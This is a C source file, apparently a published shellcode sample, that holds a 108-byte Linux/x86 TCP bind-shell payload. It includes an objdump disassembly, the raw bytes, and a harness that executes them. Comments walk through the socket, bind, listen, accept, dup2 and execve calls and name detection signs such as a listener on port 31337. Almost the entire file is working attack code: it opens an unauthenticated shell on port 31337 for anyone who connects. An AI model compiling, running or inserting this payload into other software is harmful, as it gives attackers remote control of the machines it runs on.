/*
Title : tcpbindshell (108 bytes)
Date : 15 May 2013
Author : Russell Willis <[email protected]>
Tested on: Linux/x86 (SMP Debian 3.2.41-2 i686)
$ objdump -D tcpbindshell -M intel
tcpbindshell: file format elf32-i386
Disassembly of section .text:
08048060 <_start>:
8048060: 31 c0 xor eax,eax
8048062: 31 db xor ebx,ebx
8048064: 31 c9 xor ecx,ecx
8048066: 31 d2 xor edx,edx
8048068: b0 66 mov al,0x66
804806a: b3 01 mov bl,0x1
804806c: 51 push ecx
804806d: 6a 06 push 0x6
804806f: 6a 01 push 0x1
8048071: 6a 02 push 0x2
8048073: 89 e1 mov ecx,esp
8048075: cd 80 int 0x80
8048077: 89 c6 mov esi,eax
8048079: b0 66 mov al,0x66
804807b: b3 02 mov bl,0x2
804807d: 52 push edx
804807e: 66 68 7a 69 pushw 0x697a
8048082: 66 53 push bx
8048084: 89 e1 mov ecx,esp
8048086: 6a 10 push 0x10
8048088: 51 push ecx
8048089: 56 push esi
804808a: 89 e1 mov ecx,esp
804808c: cd 80 int 0x80
804808e: b0 66 mov al,0x66
8048090: b3 04 mov bl,0x4
8048092: 6a 01 push 0x1
8048094: 56 push esi
8048095: 89 e1 mov ecx,esp
8048097: cd 80 int 0x80
8048099: b0 66 mov al,0x66
804809b: b3 05 mov bl,0x5
804809d: 52 push edx
804809e: 52 push edx
804809f: 56 push esi
80480a0: 89 e1 mov ecx,esp
80480a2: cd 80 int 0x80
80480a4: 89 c3 mov ebx,eax
80480a6: 31 c9 xor ecx,ecx
80480a8: b1 03 mov cl,0x3
080480aa <dupfd>:
80480aa: fe c9 dec cl
80480ac: b0 3f mov al,0x3f
80480ae: cd 80 int 0x80
80480b0: 75 f8 jne 80480aa
80480b2: 31 c0 xor eax,eax
80480b4: 52 push edx
80480b5: 68 6e 2f 73 68 push 0x68732f6e
80480ba: 68 2f 2f 62 69 push 0x69622f2f
80480bf: 89 e3 mov ebx,esp
80480c1: 52 push edx
80480c2: 53 push ebx
80480c3: 89 e1 mov ecx,esp
80480c5: 52 push edx
80480c6: 89 e2 mov edx,esp
80480c8: b0 0b mov al,0xb
80480ca: cd 80 int 0x80
*/
#include <stdio.h>
/*
 * Listening port, stored as two bytes with the high byte first and the
 * low byte second.
 * Current value: 0x7a69 = 31337.
 * The macro is spliced into code[] directly after the 66 68 (pushw)
 * opcode bytes, so it must stay exactly two bytes long.
 */
#define PORTHL "\x7a\x69"
/*
 * Raw machine code for the Linux/x86 routine disassembled in the file
 * header. Reading that listing, every system call goes through int 0x80:
 *   - eax=0x66 (socketcall) with ebx=1: socket(2, 1, 6), a TCP socket
 *   - eax=0x66 with ebx=2: bind to the PORTHL port with a zeroed address
 *     field, i.e. not restricted to one local address
 *   - eax=0x66 with ebx=4: listen with a backlog of 1
 *   - eax=0x66 with ebx=5: accept, both address arguments NULL
 *   - eax=0x3f (dup2) three times, pointing fds 2, 1 and 0 at the
 *     accepted connection
 *   - eax=0x0b (execve) of "//bin/sh" with argv = { path, NULL }
 *
 * For detection and triage, the visible effects are an unexpected TCP
 * listener on port 31337 and a shell process whose standard input, output
 * and error are all the same network socket. The listing contains no
 * authentication step between accept and execve.
 *
 * sizeof(code) includes the terminating NUL that the string literal adds,
 * which is why the length is reported as sizeof(code)-1.
 */
unsigned char code[] =
"\x31\xc0\x31\xdb\x31\xc9\x31\xd2\xb0\x66"
"\xb3\x01\x51\x6a\x06\x6a\x01\x6a\x02\x89"
"\xe1\xcd\x80\x89\xc6\xb0\x66\xb3\x02\x52"
"\x66\x68"PORTHL"\x66\x53\x89\xe1\x6a\x10"
"\x51\x56\x89\xe1\xcd\x80\xb0\x66\xb3\x04"
"\x6a\x01\x56\x89\xe1\xcd\x80\xb0\x66\xb3"
"\x05\x52\x52\x56\x89\xe1\xcd\x80\x89\xc3"
"\x31\xc9\xb1\x03\xfe\xc9\xb0\x3f\xcd\x80"
"\x75\xf8\x31\xc0\x52\x68\x6e\x2f\x73\x68"
"\x68\x2f\x2f\x62\x69\x89\xe3\x52\x53\x89"
"\xe1\x52\x89\xe2\xb0\x0b\xcd\x80";
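/*
 * Test harness: prints the payload length, then transfers control to the
 * bytes stored in code[].
 *
 * Returns 0 if the call through the function pointer ever returns.
 */
int main(void)
{
    /*
     * sizeof yields a size_t, so it is printed with %zu rather than %d.
     * The -1 excludes the NUL terminator the string literal appends.
     */
    printf("Shellcode Length: %zu\n", sizeof(code) - 1);

    /*
     * NOTE(review): calling a data object through a function pointer is
     * outside standard C. It only runs where the pages holding code[] are
     * mapped executable; a non-executable data mapping (NX / W^X) is
     * expected to fault at the call instead.
     */
    int (*ret)() = (int (*)())code;
    ret();
    return 0;
}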